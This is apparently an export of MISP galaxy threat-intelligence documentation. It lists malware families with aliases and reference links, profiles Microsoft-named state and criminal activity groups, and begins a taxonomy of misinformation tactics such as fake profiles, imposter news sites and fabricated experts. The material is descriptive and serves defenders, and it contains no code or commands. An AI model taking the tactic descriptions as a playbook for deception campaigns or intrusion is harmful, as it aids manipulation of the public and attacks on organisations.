Zebrocy (AutoIT) is also known as:

*Table 2795. Table References*

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<td><a href="https://www.secureworks.com/research/threat-profiles/iron-twilight">https://www.secureworks.com/research/threat-profiles/iron-twilight</a></td>
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Zedhou

The tag is: *misp-galaxy:malpedia*="Zedhou"
Zedhou is also known as:

Table 2796. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.zedhou">https://malpedia.caad.fkie.fraunhofer.de/details/win.zedhou</a></td>
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Zeoticus

The tag is: misp-galaxy:malpedia="Zeoticus"

Zeoticus is also known as:

Table 2797. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.zeoticus">https://malpedia.caad.fkie.fraunhofer.de/details/win.zeoticus</a></td>
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</table>

Zeppelin Ransomware

Zeppelin is a ransomware written in Delphi and sold as-a-service. The Cylance research team notes that it is a clear evolution of the known VegaLocker, but they assessed it as a new family because of additionally developed modules that make Zeppelin much more configurable than Vegalocker. There are executable variants of type DLL and EXE.

The tag is: misp-galaxy:malpedia="Zeppelin Ransomware"

Zeppelin Ransomware is also known as:

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<td><a href="https://storage.pardot.com/272312/124918/Flashpoint_Hunt_Team_Zeppelin_Ransomware_Analysis.pdf">https://storage.pardot.com/272312/124918/Flashpoint_Hunt_Team_Zeppelin_Ransomware_Analysis.pdf</a></td>
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<tr>
<td><a href="https://www.gdatasoftware.com/blog/2020/06/35946-burans-transformation-into-zeppelin">https://www.gdatasoftware.com/blog/2020/06/35946-burans-transformation-into-zeppelin</a></td>
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**ZeroAccess**

The tag is: `misp-galaxy:malpedia="ZeroAccess"`

ZeroAccess is also known as:

- Max++
- Sirefef
- Smiscer

*Table 2799. Table References*

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<tr>
<td><a href="http://contagiodump.blogspot.com/2012/12/zeroaccess-sirefef-rootkit-5-fresh.html">http://contagiodump.blogspot.com/2012/12/zeroaccess-sirefef-rootkit-5-fresh.html</a></td>
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</tbody>
</table>

**ZeroCleare**

ZeroCleare is a destructive malware. It has been developed in order to wipe the master boot record section in order to damage a disk’s partitioning. Attackers use the EldoS RawDisk driver to perform the malicious action, which is not a signed driver and would therefore not runnable by default. The attackers managed to install it by using a vulnerable version of VBoxDrv driver, which the DSE accepts and runs. Used to attack middle-east energy and industrial sectors.

The tag is: `misp-galaxy:malpedia="ZeroCleare"`

ZeroCleare is also known as:

*Table 2800. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.zerocleare">https://malpedia.caad.fkie.fraunhofer.de/details/win.zerocleare</a></td>
</tr>
</tbody>
</table>
ZeroEvil

ZeroEvil is a malware that seems to be distributed by an ARS guarded VBS loader.

It first connects to a gate.php (version=). Upon success, an embedded VBS gets started connecting to logs_gate.php (plugin=, report=). So far, only one embedded VBS was observed: it creates and starts a PowerShell script to retrieve all password from the Windows.Security.Credentials.PasswordVault. Apart from that, a screenshot is taken and a list of running processes generated.

The ZeroEvil executable contains multiple DLLs, sqlite3.dll, ze_core.DLL (Mutex) and ze_autorun.DLL (Run-Key).

The tag is: `misp-galaxy:malpedia=“ZeroEvil”`

ZeroEvil is also known as:

Table 2801. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroevil">https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroevil</a></td>
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ZeroLocker

The tag is: `misp-galaxy:malpedia=“ZeroLocker”`

ZeroLocker is also known as:

Table 2802. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.zerolocker">https://malpedia.caad.fkie.fraunhofer.de/details/win.zerolocker</a></td>
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<td><a href="http://stopmalvertising.com/malware-reports/introduction-to-the-zerolocker-ransomware.html">http://stopmalvertising.com/malware-reports/introduction-to-the-zerolocker-ransomware.html</a></td>
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ZeroT

The tag is: `misp-galaxy:malpedia=“ZeroT”`

ZeroT is also known as:

Table 2803. Table References

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1152
Zeus

The tag is: misp-galaxy:malpedia="Zeus"

Zeus is also known as:

- Zbot

Table 2804. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus">https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus</a></td>
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<td><a href="https://www.s21sec.com/en/zeus-the-missing-link/">https://www.s21sec.com/en/zeus-the-missing-link/</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/gold-evergreen">https://www.secureworks.com/research/threat-profiles/gold-evergreen</a></td>
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<tr>
<td><a href="http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html">http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html</a></td>
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<tr>
<td><a href="http://malwareint.blogspot.com/2010/02/zeus-on-irs-scum-remains-actively.html">http://malwareint.blogspot.com/2010/02/zeus-on-irs-scum-remains-actively.html</a></td>
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<td><a href="http://eternal-todo.com/blog/new-zeus-binary">http://eternal-todo.com/blog/new-zeus-binary</a></td>
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<td><a href="https://www.youtube.com/watch?v=LUxOcpIRxmg">https://www.youtube.com/watch?v=LUxOcpIRxmg</a></td>
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<td><a href="http://eternal-todo.com/blog/zeus-spreading-facebook">http://eternal-todo.com/blog/zeus-spreading-facebook</a></td>
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<td><a href="http://malwareint.blogspot.com/2010/03/new-phishing-campaign-against-facebook.html">http://malwareint.blogspot.com/2010/03/new-phishing-campaign-against-facebook.html</a></td>
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<td><a href="https://www.secureworks.com/research/zeus?threat=zeus">https://www.secureworks.com/research/zeus?threat=zeus</a></td>
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<td><a href="http://eternal-todo.com/blog/detecting-zeus">http://eternal-todo.com/blog/detecting-zeus</a></td>
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<td><a href="https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/">https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/</a></td>
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<td><a href="https://www.mnin.org/write/ZeusMalware.pdf">https://www.mnin.org/write/ZeusMalware.pdf</a></td>
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</table>
ZeusAction

The tag is: misp-galaxy:malpedia="ZeusAction"

ZeusAction is also known as:

Table 2805. Table References

Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_action
https://twitter.com/benkow_/status/1136983062699487232
https://www.youtube.com/watch?v=EyDiIAtdI

Zeus MailSniffer

The tag is: misp-galaxy:malpedia="Zeus MailSniffer"

Zeus MailSniffer is also known as:

Table 2806. Table References

Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_mailsniffer

Zeus OpenSSL

This family describes the Zeus-variant that includes a version of OpenSSL and usually is downloaded by Zloader.

In June 2016, the version 1.5.4.0 (PE timestamp: 2016.05.11) appeared, downloaded by Zloader (known as DEloader at that time). OpenSSL 1.0.1p is statically linked to it, thus its size is roughly 1.2 MB. In subsequent months, that size increased up to 1.6 MB. In January 2017, with version 1.14.8.0, OpenSSL 1.0.2j was linked to it, increasing the size to 1.8 MB. Soon after also in January 2017, with version v1.15.0.0 the code was obfuscated, blowing up the size of the binary to 2.2 MB.

Please note that IBM X-Force decided to call win.zloader/win.zeus_openssl “Zeus Sphinx”, after mentioning it as “a new version of Zeus Sphinx” in their initial post in August 2016. Malpedia thus lists the alias “Zeus XSphinx” for win.zeus_openssl - the X to refer to IBM X-Force.

Zeus Sphinx on the one hand has the following versioning (“slow increase”) - 2015/09 v1.0.1.0 (Zeus
Zeus OpenSSL on the other hand has the following versioning ("fast increase") - 2016/05 v1.5.4.0 (Zeus OpenSSL size: 1.2 MB) - 2017/01 v1.14.8.0 (Zeus OpenSSL size: 1.8 MB) - 2017/01 v1.15.0.0 (Zeus OpenSSL size: 2.2 MB)

The tag is: misp-galaxy:malpedia="Zeus OpenSSL"

Zeus OpenSSL is also known as:

- XSphinx

Table 2807. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_openssl">https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_openssl</a></td>
</tr>
<tr>
<td><a href="https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/">https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/</a></td>
</tr>
</tbody>
</table>

Zeus Sphinx

This family describes the vanilla Zeus-variant that includes TOR (and Polipo proxy). It has an almost 90% overlap with Zeus v2.0.8.9. Please note that IBM X-Force decided to call win.zloader/win.zeus_openssl "Zeus Sphinx", after mentioning it as "a new version of Zeus Sphinx" in their initial post in August 2016. Malpedia thus lists the alias "Zeus XSphinx" for win.zeus_openssl - the X to refer to IBM X-Force.

Zeus Sphinx on the one hand has the following versioning ("slow increase") - 2015/09 v1.0.1.0 (Zeus Sphinx size: 1.5 MB) - 2016/02 v1.0.1.2 (Zeus Sphinx size: 1.5 MB) - 2016/04 v1.0.2.0 (Zeus Sphinx size: 1.5 MB)

Zeus OpenSSL on the other hand has the following versioning ("fast increase") - 2016/05 v1.5.4.0 (Zeus OpenSSL size: 1.2 MB) - 2017/01 v1.14.8.0 (Zeus OpenSSL size: 1.8 MB) - 2017/01 v1.15.0.0 (Zeus OpenSSL size: 2.2 MB)

The tag is: misp-galaxy:malpedia="Zeus Sphinx"

Zeus Sphinx is also known as:

Table 2808. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_sphinx">https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_sphinx</a></td>
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<td><a href="https://securityaffairs.co/wordpress/39592/cyber-crime/sphinx-variant-zeus-trojan.html">https://securityaffairs.co/wordpress/39592/cyber-crime/sphinx-variant-zeus-trojan.html</a></td>
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Zezin

The tag is: misp-galaxy:malpedia="Zezin"

Zezin is also known as:

Table 2809. Table References

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<td><a href="https://twitter.com/siri">https://twitter.com/siri</a>_ urz/status/923479126656323584</td>
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ZhCat

The tag is: misp-galaxy:malpedia="ZhCat"

ZhCat is also known as:

Table 2810. Table References

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ZhMimikatz

The tag is: misp-galaxy:malpedia="ZhMimikatz"

ZhMimikatz is also known as:

Table 2811. Table References

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ZitMo

The tag is: misp-galaxy:malpedia="ZitMo"
ZitMo is also known as:

- ZeuS-in-the-Mobile

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### ZiyangRAT

The tag is: `misp-galaxy:malpedia="ZiyangRAT"`

ZiyangRAT is also known as:

### Table 2813. Table References

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<td><a href="https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators">https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators</a></td>
</tr>
</tbody>
</table>

### Zloader

This family describes the (initially small) loader, which downloads Zeus OpenSSL.

In June 2016, a new loader was dubbed DEloader by Fortinet. It has some functions borrowed from Zeus 2.0.8.9 (e.g. the versioning, nrv2b, binstorage-labels), but more importantly, it downloaded a Zeus-like banking trojan (→ Zeus OpenSSL). Furthermore, the loader shared its versioning with the Zeus OpenSSL it downloaded. The initial samples from May 2016 were small (17920 bytes). At some point, visualEncrypt/Decrypt was added, e.g. in v1.11.0.0 (September 2016) with size 27648 bytes. In January 2017 with v1.15.0.0, obfuscation was added, which blew the size up to roughly 80k, and the loader became known as Zloader aka Terdot. These changes may be related to the Moskalvzapoe Distribution Network, which started the distribution of it at the same time.

Please note that IBM X-Force decided to call win.zloader/win.zeus_openssl "Zeus Sphinx", after mentioning it as "a new version of Zeus Sphinx" in their initial post in August 2016. Malpedia thus lists the alias "Zeus XSphinx" for win.zeus_openssl - the X to refer to IBM X-Force.

The tag is: `misp-galaxy:malpedia="Zloader"`

Zloader is also known as:

- DELoader
- Terdot

### Table 2814. Table References

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<td><a href="https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/">https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/</a></td>
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Zlob

The tag is: misp-galaxy:malpedia="Zlob"

Zlob is also known as:

Table 2815. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.zlob">https://malpedia.caad.fkie.fraunhofer.de/details/win.zlob</a></td>
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ZUpdater

The tag is: misp-galaxy:malpedia="ZUpdater"

ZUpdater is also known as:

- Zpevdo

Table 2816. Table References

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ZXShell

According to FireEye, ZXSHELL is a backdoor that can be downloaded from the internet, particularly Chinese hacker websites. The backdoor can launch port scans, run a keylogger, capture screenshots, set up an HTTP or SOCKS proxy, launch a reverse command shell, cause SYN floods, and transfer/delete/run files. The publicly available version of the tool provides a graphical user interface that malicious actors can use to interact with victim backdoors. Simplified Chinese is the language used for the bundled ZXSHELL documentation.

The tag is: misp-galaxy:malpedia="ZXShell"

ZXShell is also known as:

- Sensocode

Table 2817. Table References

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Zyklon

The tag is: misp-galaxy:malpedia="Zyklon"

Zyklon is also known as:

Table 2818. Table References

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Microsoft Activity Group actor

Activity groups as described by Microsoft.

Microsoft Activity Group actor is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.

authors
Various

PROMETHIUM

PROMETHIUM is an activity group that has been active as early as 2012. The group primarily uses Truvasys, a first-stage malware that has been in circulation for several years. Truvasys has been involved in several attack campaigns, where it has masqueraded as one of server common computer utilities, including WinUtils, TrueCrypt, WinRAR, or SanDisk. In each of the campaigns, Truvasys malware evolved with additional features—this shows a close relationship between the activity groups behind the campaigns and the developers of the malware.

The tag is: misp-galaxy:microsoft-activity-group="PROMETHIUM"

PROMETHIUM has relationships with:

- similar: misp-galaxy:mitre-intrusion-set="PROMETHIUM - G0056" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:threat-actor="PROMETHIUM" with estimative-language:likelihood-probability="likely"
NEODYMIUM

NEODYMIUM is an activity group that is known to use a backdoor malware detected by Microsoft as Wingbird. This backdoor's characteristics closely match FinFisher, a government-grade commercial surveillance package. Data about Wingbird activity indicate that it is typically used to attack individual computers instead of networks.

The tag is: `misp-galaxy:microsoft-activity-group="NEODYMIUM"`

NEODYMIUM has relationships with:

- similar: `misp-galaxy:mitre-intrusion-set="NEODYMIUM - G0055"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:threat-actor="NEODYMIUM"` with estimative-language:likelihood-probability="likely"

TERBIUM

Microsoft Threat Intelligence identified similarities between this recent attack and previous 2012 attacks against tens of thousands of computers belonging to organizations in the energy sector. Microsoft Threat Intelligence refers to the activity group behind these attacks as TERBIUM, following our internal practice of assigning rogue actors chemical element names.

The tag is: `misp-galaxy:microsoft-activity-group="TERBIUM"`

TERBIUM has relationships with:

- similar: `misp-galaxy:threat-actor="TERBIUM"` with estimative-language:likelihood-probability="likely"
STRONTIUM

STRONTIUM has been active since at least 2007. Whereas most modern untargeted malware is ultimately profit-oriented, STRONTIUM mainly seeks sensitive information. Its primary institutional targets have included government bodies, diplomatic institutions, and military forces and installations in NATO member states and certain Eastern European countries. Additional targets have included journalists, political advisors, and organizations associated with political activism in central Asia. STRONTIUM is an activity group that usually targets government agencies, diplomatic institutions, and military organizations, as well as affiliated private sector organizations such as defense contractors and public policy research institutes. Microsoft has attributed more 0-day exploits to STRONTIUM than any other tracked group in 2016. STRONTIUM frequently uses compromised e-mail accounts from one victim to send malicious e-mails to a second victim and will persistently pursue specific targets for months until they are successful in compromising the victims' computer.

The tag is: misp-galaxy:microsoft-activity-group="STRONTIUM"

STRONTIUM is also known as:

- APT 28
- APT28
- Pawn Storm
- Fancy Bear
- Sednit
- TsarTeam
- TG-4127
- Group-4127
- Sofacy
- Grey-Cloud

STRONTIUM has relationships with:

- similar: misp-galaxy:mitre-intrusion-set="APT28 - G0007" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:threat-actor="Sofacy" with estimative-language:likelihood-probability="likely"

Table 2822. Table References

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DUBNIUM

DUBNIUM (which shares indicators with what Kaspersky researchers have called DarkHotel) is one of the activity groups that has been very active in recent years, and has many distinctive features.

The tag is: misp-galaxy:microsoft-activity-group="DUBNIUM"

DUBNIUM is also known as:

• darkhotel

DUBNIUM has relationships with:

• similar: misp-galaxy:threat-actor="DarkHotel" with estimative-language:likelihood-probability="likely"

Table 2823. Table References

Links

https://blogs.technet.microsoft.com/mmpc/2016/06/20/reverse-engineering-dubniums-flash-targeting-exploit/
https://blogs.technet.microsoft.com/mmpc/2016/07/14/reverse-engineering-dubnium-stage-2-payload-analysis/

PLATINUM

PLATINUM has been targeting its victims since at least as early as 2009, and may have been active for several years prior. Its activities are distinctly different not only from those typically seen in untargeted attacks, but from many targeted attacks as well. A large share of targeted attacks can be characterized as opportunistic: the activity group changes its target profiles and attack geographies based on geopolitical seasons, and may attack institutions all over the world. Like many such groups, PLATINUM seeks to steal sensitive intellectual property related to government interests, but its range of preferred targets is consistently limited to specific governmental organizations, defense institutes, intelligence agencies, diplomatic institutions, and telecommunication providers in South and Southeast Asia. The group’s persistent use of spear phishing tactics (phishing attempts aimed at specific individuals) and access to previously undiscovered zero-day exploits have made it a highly resilient threat.
The tag is: misp-galaxy:microsoft-activity-group="PLATINUM"

PLATINUM has relationships with:

- similar: misp-galaxy:mitre-intrusion-set="PLATINUM - G0068" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:threat-actor="PLATINUM" with estimative-language:likelihood-probability="likely"

Table 2824. Table References

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BARIUM

Microsoft Threat Intelligence associates Winnti with multiple activity groups—collections of malware, supporting infrastructure, online personas, victimology, and other attack artifacts that the Microsoft intelligent security graph uses to categorize and attribute threat activity. Microsoft labels activity groups using code names derived from elements in the periodic table. In the case of this malware, the activity groups strongly associated with Winnti are BARIUM and LEAD. But even though they share the use of Winnti, the BARIUM and LEAD activity groups are involved in very different intrusion scenarios. BARIUM begins its attacks by cultivating relationships with potential victims—particularly those working in Business Development or Human Resources—on various social media platforms. Once BARIUM has established rapport, they spear-phish the victim using a variety of unsophisticated malware installation vectors, including malicious shortcut (.lnk) files with hidden payloads, compiled HTML help (.chm) files, or Microsoft Office documents containing macros or exploits. Initial intrusion stages feature the Win32/Barlaiy implant—notable for its use of social network profiles, collaborative document editing sites, and blogs for C&C. Later stages of the intrusions rely upon Winnti for persistent access. The majority of victims recorded to date have been in electronic gaming, multimedia, and Internet content industries, although occasional intrusions against technology companies have occurred.

The tag is: misp-galaxy:microsoft-activity-group="BARIUM"

Table 2825. Table References

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LEAD

In contrast, LEAD has established a far greater reputation for industrial espionage. In the past few
years, LEAD’s victims have included: Multinational, multi-industry companies involved in the manufacture of textiles, chemicals, and electronics Pharmaceutical companies A company in the chemical industry University faculty specializing in aeronautical engineering and research A company involved in the design and manufacture of motor vehicles A cybersecurity company focusing on protecting industrial control systems During these intrusions, LEAD’s objective was to steal sensitive data, including research materials, process documents, and project plans. LEAD also steals code-signing certificates to sign its malware in subsequent attacks. In most cases, LEAD’s attacks do not feature any advanced exploit techniques. The group also does not make special effort to cultivate victims prior to an attack. Instead, the group often simply emails a Winnti installer to potential victims, relying on basic social engineering tactics to convince recipients to run the attached malware. In some other cases, LEAD gains access to a target by brute-forcing remote access login credentials, performing SQL injection, or exploiting unpatched web servers, and then they copy the Winnti installer directly to compromised machines.

The tag is: misp-galaxy:microsoft-activity-group="LEAD"

**Table 2826. Table References**

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**ZIRCONIUM**

In addition to strengthening generic detection of EoP exploits, Microsoft security researchers are actively gathering threat intelligence and indicators attributable to ZIRCONIUM, the activity group using the CVE-2017-0005 exploit.

The tag is: misp-galaxy:microsoft-activity-group="ZIRCONIUM"

**Table 2827. Table References**

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https://www.cfr.org/interactive/cyber-operations/mythic-leopard

This threat actor uses social engineering and spear phishing to target military and defense organizations in India, for the purpose of espionage.

The tag is: misp-galaxy:microsoft-activity-group="https://www.cfr.org/interactive/cyber-operations/mythic-leopard"

https://www.cfr.org/interactive/cyber-operations/mythic-leopard is also known as:

- C-Major
GALLIUM

Microsoft Threat Intelligence Center (MSTIC) is raising awareness of the ongoing activity by a group we call GALLIUM, targeting telecommunication providers. When Microsoft customers have been targeted by this activity, we notified them directly with the relevant information they need to protect themselves. By sharing the detailed methodology and indicators related to GALLIUM activity, we’re encouraging the security community to implement active defenses to secure the broader ecosystem from these attacks. To compromise targeted networks, GALLIUM target unpatched internet-facing services using publicly available exploits and have been known to target vulnerabilities in WildFly/JBoss. Once persistence is established in a network, GALLIUM uses common techniques and tools like Mimikatz to obtain credentials that allows for lateral movement across the target network. Within compromised networks, GALLIUM makes no attempt to obfuscate their intent and are known to use common versions of malware and publicly available toolkits with small modifications. The operators rely on low cost and easy to replace infrastructure that consists of dynamic-DNS domains and regularly reused hop points. This activity from GALLIUM has been identified predominantly through 2018 to mid-2019. GALLIUM is still active; however, activity levels have dropped when compared to what was previously observed.

The tag is: `misp-galaxy:microsoft-activity-group="GALLIUM"`

GALLIUM is also known as:

• Operation Soft Cell

GALLIUM has relationships with:

• similar: `misp-galaxy:threat-actor="Operation Soft Cell"` with estimative-language:likelihood-probability="likely"

PARINACOTA

One actor that has emerged in this trend of human-operated attacks is an active, highly adaptive
group that frequently drops Wadhrama as payload. PARINACOTA impacts three to four organizations every week and appears quite resourceful: during the 18 months that we have been monitoring it, we have observed the group change tactics to match its needs and use compromised machines for various purposes, including cryptocurrency mining, sending spam emails, or proxying for other attacks. The group's goals and payloads have shifted over time, influenced by the type of compromised infrastructure, but in recent months, they have mostly deployed the Wadhrama ransomware. The group most often employs a smash-and-grab method, whereby they attempt to infiltrate a machine in a network and proceed with subsequent ransom in less than an hour. There are outlier campaigns in which they attempt reconnaissance and lateral movement, typically when they land on a machine and network that allows them to quickly and easily move throughout the environment. PARINACOTA's attacks typically brute forces their way into servers that have Remote Desktop Protocol (RDP) exposed to the internet, with the goal of moving laterally inside a network or performing further brute-force activities against targets outside the network. This allows the group to expand compromised infrastructure under their control. Frequently, the group targets built-in local administrator accounts or a list of common account names. In other instances, the group targets Active Directory (AD) accounts that they compromised or have prior knowledge of, such as service accounts of known vendors. The group adopted the RDP brute force technique that the older ransomware called Samas (also known as SamSam) infamously used. Other malware families like GandCrab, MegaCortext, LockerGoga, Hermes, and RobbinHood have also used this method in targeted ransomware attacks. PARINACOTA, however, has also been observed to adapt to any path of least resistance they can utilize. For instance, they sometimes discover unpatched systems and use disclosed vulnerabilities to gain initial access or elevate privileges.

The tag is: misp-galaxy:microsoft-activity-group="PARINACOTA"

PARINACOTA has relationships with:

- uses: misp-galaxy:ransomware="Wadhrama" with estimative-language:likelihood-probability="likely"

Table 2830. Table References

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<td><a href="https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/">https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/</a></td>
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GADOLINIUM

GADOLINIUM is a nation-state activity group that has been compromising targets for nearly a decade with a worldwide focus on the maritime and health industries. As with most threat groups, GADOLINIUM tracks the tools and techniques of security practitioners looking for new techniques they can use or modify to create new exploit methods. Historically, GADOLINIUM used custom-crafted malware families that analysts can identify and defend against. In response, over the last year GADOLINIUM has begun to modify portions of its toolchain to use open-source toolkits to obfuscate their activity and make it more difficult for analysts to track. Because cloud services frequently offer a free trial or one-time payment (PayGo) account offerings, malicious actors have found ways to take advantage of these legitimate business offerings. By establishing free or PayGo
accounts, they can use cloud-based technology to create a malicious infrastructure that can be established quickly then taken down before detection or given up at little cost.

The tag is: `misp-galaxy:microsoft-activity-group="GADOLINIUM"`

**HAFNIUM**

HAFNIUM primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs. HAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like Covenant, for command and control. Once they've gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like MEGA. In campaigns unrelated to these vulnerabilities, Microsoft has observed HAFNIUM interacting with victim Office 365 tenants. While they are often unsuccessful in compromising customer accounts, this reconnaissance activity helps the adversary identify more details about their targets' environments. HAFNIUM operates primarily from leased virtual private servers (VPS) in the United States.

The tag is: `misp-galaxy:microsoft-activity-group="HAFNIUM"

**NOBELIUM**

Threat actor behind the attacks against SolarWinds, the SUNBURST backdoor, TEARDROP malware, GoldMax malware.

The tag is: `misp-galaxy:microsoft-activity-group="NOBELIUM"

NOBELIUM has relationships with:

- similar: `misp-galaxy:threat-actor="UNC2452"` with `estimative-language:likelihood-probability="likely"
- uses: `misp-galaxy:backdoor="SUNBURST"` with `estimative-language:likelihood-probability="likely"
- uses: `misp-galaxy:tool="TEARDROP"` with `estimative-language:likelihood-probability="likely"
- uses: `misp-galaxy:tool="GoldMax"` with `estimative-language:likelihood-probability="likely"`
Misinformation Pattern

AM!TT Technique.

Misinformation Pattern is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.

authors
misinfosecproject

5Ds (dismiss, distort, distract, dismay, divide)

Nimmo’s "4Ds of propaganda": dismiss, distort, distract, dismay (MisinfosecWG added divide in 2019). Misinformation promotes an agenda by advancing narratives supportive of that agenda. This is most effective when the advanced narrative pre-dates the revelation of the specific misinformation content. But this is often not possible.

The tag is: misp-galaxy:amitt-misinformation-pattern=“5Ds (dismiss, distort, distract, dismay, divide)”

Facilitate State Propaganda

Organize citizens around pro-state messaging. Paid or volunteer groups coordinated to push state propaganda (examples include 2016 Diba Facebook Expedition, coordinated to overcome China’s Great Firewall to flood the Facebook pages of Taiwanese politicians and news agencies with a pro-PRC message).

The tag is: misp-galaxy:amitt-misinformation-pattern="Facilitate State Propaganda”

Leverage Existing Narratives

Use or adapt existing narrative themes, where narratives are the baseline stories of a target
audience. Narratives form the bedrock of our worldviews. New information is understood through a process firmly grounded in this bedrock. If new information is not consistent with the prevailing narratives of an audience, it will be ignored. Effective campaigns will frame their misinformation in the context of these narratives. Highly effective campaigns will make extensive use of audience-appropriate archetypes and meta-narratives throughout their content creation and amplification practices. Examples include midwesterners are generous, Russia is under attack from outside.

The tag is: **misp-galaxy:amitt-misinformation-pattern=Leverage Existing Narratives**

**Competing Narratives**

Advance competing narratives connected to same issue ie: on one hand deny incident while at same time expresses dismiss. MH17 (example) "Russian Foreign Ministry again claimed that "absolutely groundless accusations are put forward against the Russian side, which are aimed at discrediting Russia in the eyes of the international community" (deny); "The Dutch MH17 investigation is biased, anti-Russian and factually inaccurate" (dismiss).

Suppressing or discouraging narratives already spreading requires an alternative. The most simple set of narrative techniques in response would be the construction and promotion of contradictory alternatives centered on denial, deflection, dismissal, counter-charges, excessive standards of proof, bias in prohibition or enforcement, and so on.

These competing narratives allow loyalists cover, but are less compelling to opponents and fence-sitters than campaigns built around existing narratives or highly explanatory master narratives. Competing narratives, as such, are especially useful in the "firehose of misinformation" approach.

The tag is: **misp-galaxy:amitt-misinformation-pattern=Competing Narratives**

**Center of Gravity Analysis**

Recon/research to identify "the source of power that provides moral or physical strength, freedom of action, or will to act." Thus, the center of gravity is usually seen as the "source of strength". Includes demographic and network analysis of communities

The tag is: **misp-galaxy:amitt-misinformation-pattern=Center of Gravity Analysis**
Create Master Narratives

The promotion of beneficial master narratives is perhaps the most effective method for achieving long-term strategic narrative dominance. From a “whole of society” perspective the promotion of the society’s core master narratives should occupy a central strategic role. From a misinformation campaign / cognitive security perspective the tactics around master narratives center more precisely on the day-to-day promotion and reinforcement of this messaging. In other words, beneficial, high-coverage master narratives are a central strategic goal and their promotion constitutes an ongoing tactical struggle carried out at a whole-of-society level.

By way of example, major powers are promoting master narratives such as: * "Huawei is determined to build trustworthy networks" * "Russia is the victim of bullying by NATO powers" * "USA is guided by its founding principles of liberty and egalitarianism"

Tactically, their promotion covers a broad spectrum of activities both on- and offline.

The tag is: **misp-galaxy:amitt-misinformation-pattern="Create Master Narratives"**

Create fake Social Media Profiles / Pages / Groups

Create key social engineering assets needed to amplify content, manipulate algorithms, fool public and/or specific incident/campaign targets.

Computational propaganda depends substantially on false perceptions of credibility and acceptance. By creating fake users and groups with a variety of interests and commitments, attackers can ensure that their messages both come from trusted sources and appear more widely adopted than they actually are.

Examples: Ukraine elections (2019) circumvent Facebook’s new safeguards by paying Ukrainian citizens to give a Russian agent access to their personal pages. EU Elections (2019) Avaaz reported more than 500 suspicious pages and groups to Facebook related to the three-month investigation of Facebook disinformation networks in Europe. Mueller report (2016) The IRA was able to reach up to 126 million Americans on Facebook via a mixture of fraudulent accounts, groups, and advertisements, the report says. Twitter accounts it created were portrayed as real American voices by major news outlets. It was even able to hold real-life rallies, mobilizing hundreds of people at a time in major cities like Philadelphia and Miami.

The tag is: **misp-galaxy:amitt-misinformation-pattern="Create fake Social Media Profiles / Pages / Groups"**
Create fake or imposter news sites

Modern computational propaganda makes use of a cadre of imposter news sites spreading globally. These sites, sometimes motivated by concerns other than propaganda—for instance, click-based revenue—often have some superficial markers of authenticity, such as naming and site-design. But many can be quickly exposed with reference to their ownership, reporting history and advertising details. A prominent case from the 2016 era was the Denver Guardian, which purported to be a local newspaper in Colorado and specialized in negative stories about Hillary Clinton.

The tag is: misp-galaxy:amitt-misinformation-pattern="Create fake or imposter news sites"

Create fake experts

Stories planted or promoted in computational propaganda operations often make use of experts fabricated from whole cloth, sometimes specifically for the story itself. For example, in the Jade Helm conspiracy theory promoted by SVR in 2015, a pair of experts—one of them naming himself a “Military Intelligence Analyst / Russian Regional CME” and the other a “Geopolitical Strategist, Journalist & Author”—pushed the story heavily on LinkedIn.

The tag is: misp-galaxy:amitt-misinformation-pattern="Create fake experts"

Cultivate useful idiots

Cultivate propagandists for a cause, the goals of which are not fully comprehended, and who are used cynically by the leaders of the cause. Independent actors use social media and specialised web sites to strategically reinforce and spread messages compatible with their own. Their networks are infiltrated and used by state media disinformation organisations to amplify the state’s own disinformation strategies against target populations. Many are traffickers in conspiracy theories or hoaxes, unified by a suspicion of Western governments and mainstream media. Their narratives, which appeal to leftists hostile to globalism and military intervention and nationalists against immigration, are frequently infiltrated and shaped by state-controlled trolls and altered news items from agencies such as RT and Sputnik. Also know as “useful idiots” or “unwitting agents”. 
The tag is: `misp-galaxy:amitt-misinformation-pattern="Cultivate useful idiots"

**Hijack legitimate account**

